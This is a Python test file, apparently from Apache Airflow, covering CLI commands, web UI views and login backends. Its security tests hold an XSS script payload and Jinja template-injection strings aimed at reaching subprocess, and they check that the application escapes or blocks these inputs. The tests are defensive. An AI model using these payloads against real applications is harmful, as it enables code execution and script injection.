def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
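# Tests for the `airflow` command line interface: parsing, dag/task listing,
# connections, pools, variables and the webserver daemon commands.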
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
        conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['bigquery_default', 'bigquery'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
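    # Exercises the add and delete paths of the `airflow connections` CLI,
    # including duplicates, missing arguments and invalid flag combinations.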
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to check the added connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Check that the connections were added as expected
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
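    # Starts the webserver as a daemon, waits for its pidfile, then terminates
    # the gunicorn monitor and checks that no processes remain.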
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
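# Web security tests: CSRF handling, XSS escaping and protection of chart_data
# against template-based remote code execution.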
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
            # exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1_id = session.query(Chart).filter(Chart.label=='insecure_chart').first().id
with self.assertRaises(SecurityError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1_id))
chart2_id = session.query(Chart).filter(Chart.label=="{{ ''.__class__.__mro__[1].__subclasses__() }}").first().id
with self.assertRaises(SecurityError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2_id))
chart3_id = session.query(Chart).filter(Chart.label=="{{ subprocess.check_output('ls') }}").first().id
with self.assertRaises(UndefinedError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3_id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
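# Smoke tests for the admin web UI views (index, graph, tree, logs, dag/task
# stats, clear/success/run actions) using the Flask test client.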
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of the date.
        url = "/admin/airflow/graph?" + urlencode({
            "dag_id": self.dag_bash2.dag_id,
            "execution_date": self.dagrun_bash2.execution_date,
        }).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
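# Login/logout flow against the password auth backend
# (airflow.contrib.auth.backends.password_auth).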
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
